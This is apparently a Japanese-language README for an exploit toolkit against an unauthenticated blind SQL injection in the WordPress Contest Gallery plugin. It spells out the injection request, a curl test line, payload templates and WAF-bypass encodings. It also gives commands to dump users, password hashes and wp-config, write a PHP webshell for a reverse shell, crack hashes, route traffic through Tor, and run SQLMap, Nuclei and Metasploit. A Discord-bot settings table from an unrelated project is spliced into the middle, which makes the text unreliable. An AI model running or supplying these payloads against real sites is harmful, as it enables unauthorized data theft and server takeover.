
CVE-2026-3180 - WordPress Contest Gallery SQL Injection 脆弱性のための完全なエクスプロイトツールキット。自動データ抽出、WAFバイパス、リバースシェル、SQLMap統合、Burp拡張機能の生成、ペネトレーションテストおよびセキュリティ研究のためのレポート作成を特長としています。
CVE-2026-3180の概念実証評価ツール
作者: Sudeepa Wanigarathna · 発見: cardosource
[!IMPORTANT] 認可された使用のみ。 このツールは、セキュリティ研究、教育、および所有しているか明示的な書面による許可を得たシステムのテストを目的としています。コンピュータシステムへの不正アクセスは違法です。作者は誤用に対する責任を負いません。
CVE-2026-3180は、WordPressのContest Galleryプラグインにおける高深刻度の認証不要ブラインドSQLインジェクションです。この脆弱性は、post_cg1l_resend_unconfirmed_mail_frontend AJAXハンドラに存在し、cgl_mailパラメータが適切なサニタイズなしにSQLクエリに渡されます。このリポジトリは、許可されたセキュリティ専門家が影響を検証し、WordPressデータを抽出し、レポートを生成し、業界標準ツール(SQLMap、Burp Suite、Nuclei)と統合するためのフル機能のPython PoC(v2.0)を提供します。
| フィールド | 値 |
|---|
POST /wp-admin/admin-ajax.php HTTP/1.1 Host: target.example Content-Type: application/x-www-form-urlencoded
action=post_cg1l_resend_unconfirmed_mail_frontend &cgl_mail=qualquer'OR/**/1=1#@teste.com &cgl_page_id=1 &cgl_activation_key= &cg_nonce=%20
### References
- [CVE-2026-3180](https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-3180)
- [Exploit-DB 52609](https://www.exploit-db.com/exploits/52609)
- [元の解説記事 (cardosource)](https://dev.to/22l31on/wordpress-contest-gallery-plugin-vulnerability-2ff6)
---
## 機能
### コアエクスプロイト
| 機能 | 説明 |
|---|---|
| 脆弱性検出 | ブール型、時間ベース、エラーベース、UNION、スタック型クエリのテスト |
| ブラインド抽出 | ブール推論によるバイナリサーチ文字抽出 |
| フルデータダンプ | ユーザー、データベースメタデータ、オプション、プラグイン、テーマ、投稿、テーブル |
| インタラクティブSQLシェル | バックエンドに対して任意のSELECTクエリを実行 |
| wp-config.php抽出 | 一般的なパスに対するLOAD_FILE()試行 |
| リバースシェル | INTO OUTFILE/DUMPFILEによるPHPウェブシェルの書き込み(許可されている場合) |
### 回避とパフォーマンス
| 機能 | 説明 |
|---|---|
| WAF回避 | 15以上のエンコードおよび難読化技術 |
| マルチスレッド | 高速抽出のための設定可能なワーカースレッド |
| レート制限 | リクエスト間の設定可能な遅延 |
| リトライロジック | 一時的な障害時の自動リトライ |
| User-Agentローテーション | リクエストごとにランダムなブラウザフィンガープリント |
| プロキシサポート | HTTP/SOCKSプロキシおよびTor(socks5h://127.0.0.1:9050) |
### レポートと統合
| 機能 | 説明 |
|---|---|
| レポート生成 | 抽出サマリーを含むJSONおよびHTMLレポート |
| SQLMap統合 | タンパー付きの自動生成SQLMapコマンド |
| Burp Suite拡張 | ジェネレーター + スタンドアロンのburp_contest_gallery.py |
| Nucleiテンプレート | 大量検出用のYAMLテンプレート |
| Metasploitモジュール | Ruby補助モジュール(contest_gallery_sqli.rb) |
| シェル自動化 | curlベースおよびSQLMapワークフロー用のBashスクリプト |
### 運用
| 機能 | 説明 |
|---|---|
| カラーCLI出力 | 重大度レベルによる構造化ログ |
| 進捗トラッキング | リアルタイムメトリクス(リクエスト数、タイミング、抽出速度) |
| クワイエット/バーボースモード | スクリプト化やデバッグに適したモード |
| シグナルハンドリング | Ctrl+C時のグレースフルクリーンアップ |
| Docker対応 | コンテナ化デプロイメントのサポート |
| CI/CDパイプライン対応 | 自動化のための終了コードとJSON出力 |
---
## インストール
### 前提条件
- Python 3.8以上
- pip
- テスト対象へのネットワーク到達可能性
### オプションの外部ツール
| ツール | 目的 |
|---|---|
| [SQLMap](https://github.com/sqlmapproject/sqlmap) | 自動SQLインジェクション |
| [Burp Suite](https://portswigger.net/burp) | 手動テストと拡張機能ホスティング |
| [Nuclei](https://github.com/projectdiscovery/nuclei) | テンプレートベースのスキャン |
| [Hashcat](https://hashcat.net/hashcat/) | オフラインハッシュクラック |
| [Tor](https://www.torproject.org/) | 匿名ルーティング(--proxy tor) |
### セットアップ```bash
git clone https://github.com/CerberusMrXi/WP-Contest-Gallery-28.1.4-Exploit.git
cd WP-Contest-Gallery-28.1.4-Exploit
python3 -m venv venv
source venv/bin/activate # Windows: venv\Scripts\activate
pip install -r requirements.txt
python3 cve-2026-3180.py --help
必須(実行時):```text requests>=2.31.0
**推奨 (from requirements.txt):**```text
colorama>=0.4.6
tqdm>=4.65.0
pyyaml>=6.0
python-dateutil>=2.8.2
urllib3>=2.0.0
メインのエクスプロイトは Python 標準ライブラリと
requestsのみを使用します。追加のパッケージにより出力とレポートが強化されます。
http://target.exampleをラボまたは許可されたターゲットのみに置き換えてください。
python3 cve-2026-3180.py http://target.example --scan
### 完全なエクスプロイテーション (検出 + 抽出)```bash
python3 cve-2026-3180.py http://target.example
python3 cve-2026-3180.py http://target.example --dump users
### 対話型SQLシェル```bash
python3 cve-2026-3180.py http://target.example --sql-shell
python3 cve-2026-3180.py http://target.example --report html -o assessment.html
### Burp プロキシ経由```bash
python3 cve-2026-3180.py http://target.example --proxy http://127.0.0.1:8080 -v
python3 cve-2026-3180.py http://target.example --scan
ブール型、時間ベース、エラーベースの検出を完全な抽出なしで実行します。
### 完全なデータ抽出```bash
python3 cve-2026-3180.py http://target.example --dump all
データベース情報、ユーザー、オプション、プラグイン、テーマ、投稿、テーブル、およびシステムメタデータを抽出します。
python3 cve-2026-3180.py http://target.example --dump database python3 cve-2026-3180.py http://target.example --dump users python3 cve-2026-3180.py http://target.example --dump config python3 cve-2026-3180.py http://target.example --dump options python3 cve-2026-3180.py http://target.example --dump plugins python3 cve-2026-3180.py http://target.example --dump themes
### 対話型SQLシェル```bash
python3 cve-2026-3180.py http://target.example --sql-shell
vis```text sql> SELECT DATABASE() wordpress
sql> show users [ { "username": "admin", "email": "[email protected]", "password_hash": "$P$B..." } ]
sql> show tables ["wp_users", "wp_posts", "wp_options", ...]
sql> exit
**シェルコマンド:**
| Command | Description |
|---|---|
| `SELECT ...` | SQLクエリを実行し、結果を表示する |
| `show users` | キャッシュされた抽出ユーザーを表示する |
| `show tables` | キャッシュされたテーブル一覧を表示する |
| `show database` | キャッシュされたDBメタデータを表示する |
| `show config` | 抽出されていればwp-config.phpを表示する |
| `show options` | WordPressオプションを表示する |
| `show plugins` | アクティブなプラグインを表示する |
| `help` | 利用可能なコマンドを一覧表示する |
| `exit` / `quit` | シェルを終了する |
### レポート生成```bash
# JSON report (default, saved to reports/)
python3 cve-2026-3180.py http://target.example --report json
# HTML report with custom filename
python3 cve-2026-3180.py http://target.example --report html -o reports/assessment.html
nc -lvnp 4444
python3 cve-2026-3180.py http://target.example --reverse-shell 10.0.0.5 4444
> `FILE`権限、書き込み可能なウェブルート、および`secure_file_priv`が対象パスをブロックしていないことが必要です。
### SQLMap コマンド生成```bash
python3 cve-2026-3180.py http://target.example --sqlmap
または、バンドルされた自動化スクリプトを使用してください:```bash chmod +x sqlmap_automation.sh ./sqlmap_automation.sh http://target.example
### Burp Suite 拡張機能```bash
# Generate extension from exploit
python3 cve-2026-3180.py http://target.example --burp-extension
# Or load the standalone extension
# Burp → Extender → Extensions → Add → Python → burp_contest_gallery.py
python3 cve-2026-3180.py http://target.example --nuclei-template
nuclei -u http://target.example -t CVE-2026-3180.yaml
### Bash自動化(Python不使用)```bash
chmod +x cve-2026-3180_automated.sh
./cve-2026-3180_automated.sh http://target.example
python3 cve-2026-3180.py http://target.example --proxy tor
### パフォーマンスチューニング```bash
python3 cve-2026-3180.py http://target.example \
--threads 20 \
--timeout 15 \
--delay 0.1 \
--retries 5 \
-v
| 引数 | 説明 |
|---|---|
target | ターゲットのWordPressベースURL (例: http://target.example) |
| 引数 | 説明 |
|---|---|
--verbose, -v | デバッグログを有効化 |
--quiet | コンソール出力を抑制 |
--output, -o | カスタム出力ファイルパス |
このツールは自動的に複数のインジェクション戦略をテストし、使用します:
PayloadManager は12以上のインジェクションテンプレートをローテーションします:```text
'OR//{condition}#@teste.com
'OR{condition}-- -
')OR{condition}#
'))OR{condition}#
'OR//{condition}OR//'1'='1'#
'UNION//SELECT{condition}#
...
### Boolean Extraction Algorithm
1. 真偽のベースライン長から脆弱性を確認する
2. ターゲットクエリ結果の `LENGTH()` を二分探索する
3. 各文字位置に対して `ASCII(SUBSTRING(...))` を二分探索する
4. 抽出した文字から完全な文字列を組み立てる
---
## WAF バイパス
ランダムまたは要求に応じて適用される組み込みの難読化手法:
| 手法 | 説明 |
|---|---|
| `comment_obfuscation` | スペースを `/**/`, `/*!*/`, `-- `, `#` に置き換え |
| `case_variation` | アルファベット文字の大文字/小文字をランダムに変更 |
| `url_encoding` | 標準のパーセントエンコーディング |
| `double_url_encoding` | 入れ子のパーセントエンコーディング |
| `hex_encoding` | `%41`形式の16進エンコーディング |
| `unicode_encoding` | `%u0041`形式のUnicodeエンコーディング |
| `white_space_variation` | スペースの代わりにタブ、改行、改ページを使用 |
| `keyword_obfuscation` | キーワードの分割: `SEL/**/ECT`, `UNI/**/ION` |
| `concat_obfuscation` | `CHAR()` を `\|\|` で連結 |
| `char_obfuscation` | `CHAR()` を `+` で加算 |
変換されたペイロードの例:
``````text
qualquer'OR/**/1=1#@teste.com
→ qualquer'%2F**%2FOR%2F**%2F1%3D1%23%40teste.com
{ "username": "admin", "password_hash": "$P$Bxxxxxxxxxxxxxxxxxxxxxxxxxxxxx", "email": "[email protected]", "roles": ["administrator"] }
### パスワードハッシュクラッキング(オフライン)
抽出後、WordPressのphpassハッシュをHashcatでクラックする:```bash
# Save hashes to file
python3 cve-2026-3180.py http://target.example --dump users -o users.json
# Crack with Hashcat (mode 400 = phpass)
hashcat -m 400 -a 0 hashes.txt /usr/share/wordlists/rockyou.txt
生成されたコマンド (--sqlmap 経由):```bash
sqlmap -u "http://target.example/wp-admin/admin-ajax.php"
--data "action=post_cg1l_resend_unconfirmed_mail_frontend&cgl_mail=test'&cgl_page_id=1&cgl_activation_key=&cg_nonce=%20"
-p cgl_mail
--dbms=mysql
--level=3 --risk=2
--batch
--threads=5
--time-sec=5
--retries=3
--delay=0.05
--random-agent
--hex
--tamper=space2comment,randomcase,between,charencode
--dbs
### Burp Suite
1. 「Load」 `burp_contest_gallery.py` を **Extender → Extensions → Add** で読み込む
2. **CVE-2026-3180** タブを開く
3. ターゲット URL を入力し **Exploit** をクリック
4. パッシブスキャナが AJAX リクエストをチェックし、Contest Gallery のインジケータを探す
### Nuclei```yaml
id: CVE-2026-3180
info:
name: WordPress Contest Gallery SQL Injection
severity: high
classification:
cve-id: CVE-2026-3180
cvss-score: 7.5
requests:
- method: POST
path: /wp-admin/admin-ajax.php
body: "action=post_cg1l_resend_unconfirmed_mail_frontend&cgl_mail=test'&cgl_page_id=1&cgl_activation_key=&cg_nonce=%20"
cp contest_gallery_sqli.rb ~/.msf4/modules/auxiliary/scanner/http/
msfconsole -q -x "use auxiliary/scanner/http/contest_gallery_sqli; set RHOSTS target.example; run"
---
## 攻撃チェーン```mermaid
flowchart TD
A["Unauthenticated POST to admin-ajax.php"] --> B["cgl_mail parameter unsanitized"]
B --> C{"Injection type?"}
C -->|Boolean| D["Response length inference"]
C -->|Time| E["SLEEP delay inference"]
C -->|Error| F["SQL error leakage"]
D --> G["Binary-search extraction"]
E --> G
F --> G
G --> H["WordPress data exfiltration"]
H --> I["Users / hashes / options / config"]
I --> J["Optional: OUTFILE webshell"]
post_cg1l_resend_unconfirmed_mail_frontend AJAXアクション。cgl_mailの値がパラメータ化なしでSQLに連結される。[] Target: http://target.example [] Checking vulnerability... [+] Target is VULNERABLE! (Boolean-based) [+] Response length difference: 42 chars [*] Extracting database information... [+] name: wordpress [+] version: 8.0.35 [+] Found 3 users [+] Exploitation complete!
### JSON レポート構造```json
{
"metadata": {
"cve": "CVE-2026-3180",
"cvss_score": "7.5 (High)",
"type": "boolean_based"
},
"target": {
"url": "http://target.example",
"ajax_url": "http://target.example/wp-admin/admin-ajax.php"
},
"vulnerability": {
"vulnerable": true,
"type": "boolean_based"
},
"extracted_data": {
"database": { "name": "wordpress", "version": "8.0.35" },
"users": [],
"tables": [],
"plugins": [],
"options": {}
},
"summary": {
"users_found": 3,
"tables_found": 12,
"plugins_found": 8,
"config_extracted": false
}
}
レポートはデフォルトで reports/ に保存されます。
FROM python:3.11-slim
WORKDIR /app COPY requirements.txt cve-2026-3180.py ./ RUN pip install --no-cache-dir -r requirements.txt
ENTRYPOINT ["python3", "cve-2026-3180.py"] CMD ["--help"]
## ⚙️ 設定方法
本ツールは環境変数により設定可能です。`.env.template` を `.env` にコピーし、必要に応じて編集してください。
| 変数 | 型 | 必須 | デフォルト値 | 説明 |
| :--- | :--- | :--- | :--- | :--- |
| `DISCORD_TOKEN` | str | はい | None | Discord アプリのボットトークン。 |
| `GUILD_ID` | int | はい | None | bot が属し、操作対象とする Discord サーバー (ギルド) の ID。 |
| `DATABASE_URL` | str | いいえ | `sqlite+aiosqlite:///data/korii.db` | データベースの接続文字列。 |
| `KORII_URL` | str | いいえ | `http://localhost:5173` | フロントエンド UI (Korii) の URL。特定の機能で使用。 |
| `LOG_LEVEL` | str | いいえ | `INFO` | ログレベル (`DEBUG`, `INFO`, `WARNING`, `ERROR`, `CRITICAL`)。 |
| `LOG_FILE` | str | いいえ | なし | 設定された場合、デバッグログを指定のファイルに出力。 |
| `SENTRY_DSN` | str | いいえ | なし | Sentry Data Source Name。エラー監視に利用。 |
| `BLACKLISTED_CATEGORIES` | list[int] | いいえ | なし | チケット作成を禁止するカテゴリ ID のリスト (カンマ区切り)。 |
| `BACKUP_INTERVAL_MINUTES` | int | いいえ | 60 | データベースバックアップの間隔 (分)。 |
| `BACKUPS_KEEP` | int | いいえ | 24 | 保持するバックアップの最大数。 |
| `SUBSCRIPTION_CHECK_INTERVAL_MINUTES` | int | いいえ | 60 | 定期購読の有効期限確認の間隔 (分)。 |
| `LOCATION_CHECK_INTERVAL_MINUTES` | int | いいえ | 10 | サーバー所在地チェックの間隔 (分)。 |
| `UPDATE_CHECK_INTERVAL_MINUTES` | int | いいえ | 360 | アップデートチェックの間隔 (分)。 |
| `IPINFO_TOKEN` | str | いいえ | なし | ipinfo.io の API トークン。IP の位置情報取得に使用。 |```bash
# Build
docker build -t cve-2026-3180 .
# Scan
docker run --rm cve-2026-3180 http://target.example --scan
# Full exploit with report volume
docker run --rm -v $(pwd)/reports:/app/reports cve-2026-3180 \
http://target.example --report json
許可されたステージングスキャン用のGitHub Actionsワークフローの例:```yaml name: CVE-2026-3180 Staging Scan
on: workflow_dispatch: schedule: - cron: '0 2 * * 1'
jobs: scan: runs-on: ubuntu-latest steps: - uses: actions/checkout@v4
- uses: actions/setup-python@v5
with:
python-version: '3.11'
- run: pip install -r requirements.txt
- name: Vulnerability scan
run: |
python3 cve-2026-3180.py ${{ secrets.STAGING_URL }} \
--scan --quiet
continue-on-error: true
- name: Generate report
run: |
python3 cve-2026-3180.py ${{ secrets.STAGING_URL }} \
--report json -o reports/staging.json
- uses: actions/upload-artifact@v4
with:
name: security-report
path: reports/
---
## トラブルシューティング
| 症状 | 試すこと |
|---|---|
| 対象が脆弱でない | Contest Gallery ≤ 28.1.4 がインストールされ有効であることを確認 |
| レスポンス長の差がない | 時間ベースのフォールバックとして `--scan` を試す; `--timeout` を増やす |
| 抽出が非常に遅い | `--threads` を増やす; `--delay` を慎重に減らす |
| 接続エラー | `--timeout` と `--retries` を上げる; プロキシ設定を確認 |
| WAF がリクエストをブロック | `--proxy tor` を使用; ツールは自動でバイパス技術を適用 |
| Tor プロキシが失敗 | Tor が `127.0.0.1:9050` で動作しているか確認; 必要なら `requests[socks]` をインストール |
| ユーザーダンプが空 | テーブルプレフィックスが `wp_` でない可能性; カスタムクエリで `--sql-shell` を使用 |
| wp-config が見つからない | 代替 `LOAD_FILE()` パスで `--sql-shell` を試す |
| リバースシェルが失敗 | `FILE` 権限、`secure_file_priv`、Webルートのパーミッションを確認 |
### デバッグワークフロー```bash
# Verbose scan
python3 cve-2026-3180.py http://target.example --scan -v
# Through Burp
python3 cve-2026-3180.py http://target.example \
--proxy http://127.0.0.1:8080 -v --scan
# Manual curl verification
curl -s -X POST "http://target.example/wp-admin/admin-ajax.php" \
-d "action=post_cg1l_resend_unconfirmed_mail_frontend&cgl_mail=qualquer'OR/**/1=1#@teste.com&cgl_page_id=1&cgl_activation_key=&cg_nonce=%20" \
-w "\nSize: %{size_download}\n"
exploit/ ├── cve-2026-3180.py # Main exploit tool (v2.0) ├── requirements.txt # Python dependencies ├── README.md # This file ├── burp_contest_gallery.py # Standalone Burp Suite extension ├── contest_gallery_sqli.rb # Metasploit auxiliary module ├── cve-2026-3180_automated.sh # Bash/curl automation script ├── sqlmap_automation.sh # SQLMap wrapper script ├── reports/ # Generated reports (created at runtime) ├── backups/ # Database backups (created at runtime) ├── payloads/ # Custom payload storage └── venv/ # Local virtualenv (optional, not committed)
---
## バージョン履歴
### v2.0.0 — 究極版 (2026年1月)
- ブーリアン、時間、エラー、ユニオン、スタック型インジェクション検出
- WordPressデータ抽出の完全パイプライン
- 15以上のWAFバイパス手法
- インタラクティブSQLシェル
- JSON/HTMLレポート生成
- SQLMap、Burp、Nucleiとの統合
- `INTO OUTFILE` によるリバースシェル
- プロキシとTorサポート
- リトライロジック付きマルチスレッド
- カラー出力と構造化ログ
### v1.0 — 初回リリース
- 基本的なブーリアンベースの検出
- 手動ユーザー抽出
---
## 免責事項
このプロジェクトは**防御的なセキュリティ研究**および**許可されたペネトレーションテスト**のために**現状のまま**提供されます。
本ソフトウェアを使用することにより、以下に同意するものとします:
1. 所有しているシステム、または明示的にテストを許可されたシステムのみを対象とします。
2. 該当するコンピュータ不正使用およびデータ保護法を理解しているものとします。
3. 著者および貢献者は、不正使用による損害、データ損失、または法的結果について**責任を負いません**。
本脆弱性を本番環境で発見した場合は、責任ある開示慣行に従い、該当するプラグインベンダー/WordPressセキュリティチームと調整を行ってください。
---
## 著者とクレジット
| 役割 | 名前 |
|---|---|
| **ツール作者** | Sudeepa Wanigarathna |
| **発見者** | cardosource |
| **CVE** | CVE-2026-3180 |
| **ライセンス** | MIT |
---
## ライセンス```
MIT License
Copyright (c) 2026 Sudeepa Wanigarathna
Permission is hereby granted, free of charge, to any person obtaining a copy
of this software and associated documentation files (the "Software"), to deal
in the Software without restriction, including without limitation the rights
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
copies of the Software, and to permit persons to whom the Software is
furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all
copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT.
認可されたセキュリティテストにのみ使用してください。
| 属性 | 値 |
|---|
| CVE ID | CVE-2026-3180 |
| CVSS | 7.5 (高) |
| 攻撃ベクトル | ネットワーク — 認証不要 |
| 影響 | 機密性侵害、データベース読み取り、認証情報の窃取 |
| 影響を受ける製品 | WordPress Contest Galleryプラグイン |
| 影響を受けるバージョン | 28.1.4以前 |
| 脆弱性の種類 | ブラインドSQLインジェクション |
| DBMS | MySQL / MariaDB |
| URL | /wp-admin/admin-ajax.php |
| メソッド | POST |
| アクション | post_cg1l_resend_unconfirmed_mail_frontend |
| 脆弱なパラメータ | cgl_mail |
| 引数 | デフォルト | 説明 |
|---|
--proxy | — | プロキシURL、またはTor経由のSOCKS5用tor |
--timeout | 10 | HTTPリクエストのタイムアウト (秒) |
--delay | 0.05 | リクエスト間の遅延 (秒) |
--retries | 3 | 失敗したリクエストのリトライ回数 |
--threads, -t | 5 | スレッドプールサイズ |
| 引数 | 説明 |
|---|
| (デフォルト) | 完全エクスプロイト: 検出→スキャン→すべて抽出 |
--scan | 脆弱性検出のみ |
--sql-shell | 対話型SQLシェル |
--dump {users,config,database,options,plugins,themes,all} | 特定のデータを抽出 |
--report {json,html} | 評価レポートを生成 |
--reverse-shell LHOST LPORT | ファイル書き込みによるリバースシェルを試行 |
--sqlmap | SQLMapコマンドを表示 |
--burp-extension | Burp Suite拡張を生成 |
--nuclei-template | Nuclei YAMLテンプレートを生成 |
| 種類 | 検出方法 | 使用例 |
|---|
| ブールベース | 応答長の差分 (1=1 対 1=2) | 主要な抽出エンジン |
| 時間ベース | SLEEP() 遅延推論 | ブール信号が弱い場合のフォールバック |
| エラーベース | EXTRACTVALUE() / SQLエラー文字列 | エラーが漏洩する場合の高速メタデータ抽出 |
| ユニオンベース | UNION SELECT ペイロード | 直接的な値の取得 (適用可能な場合) |
| スタッククエリ | '; ... # 構文 | マルチステートメント実行 (稀) |
| ターゲット | SQLソース | 出力キー |
|---|
| データベース名 | SELECT DATABASE() | database.name |
| DBバージョン | SELECT VERSION() | database.version |
| DBユーザー | SELECT USER() | database.user |
| テーブル | information_schema.TABLES | tables[] |
| カラム | information_schema.COLUMNS | columns{} |
| WPユーザー | wp_users | users[] |
| パスワードハッシュ | wp_users.user_pass | users[].password_hash |
| メールアドレス | wp_users.user_email | users[].email |
| ロール | wp_usermeta の capabilities | users[].roles |
| サイトオプション | wp_options | options{} |
| 有効なプラグイン | wp_options.active_plugins | plugins[] |
| テーマ | template / stylesheet オプション | themes[] |
| 投稿 | wp_posts | posts[] |
| wp-config.php | LOAD_FILE('/var/www/html/wp-config.php') | config |
| システム情報 | @@hostname、@@datadirなど | system_info{} |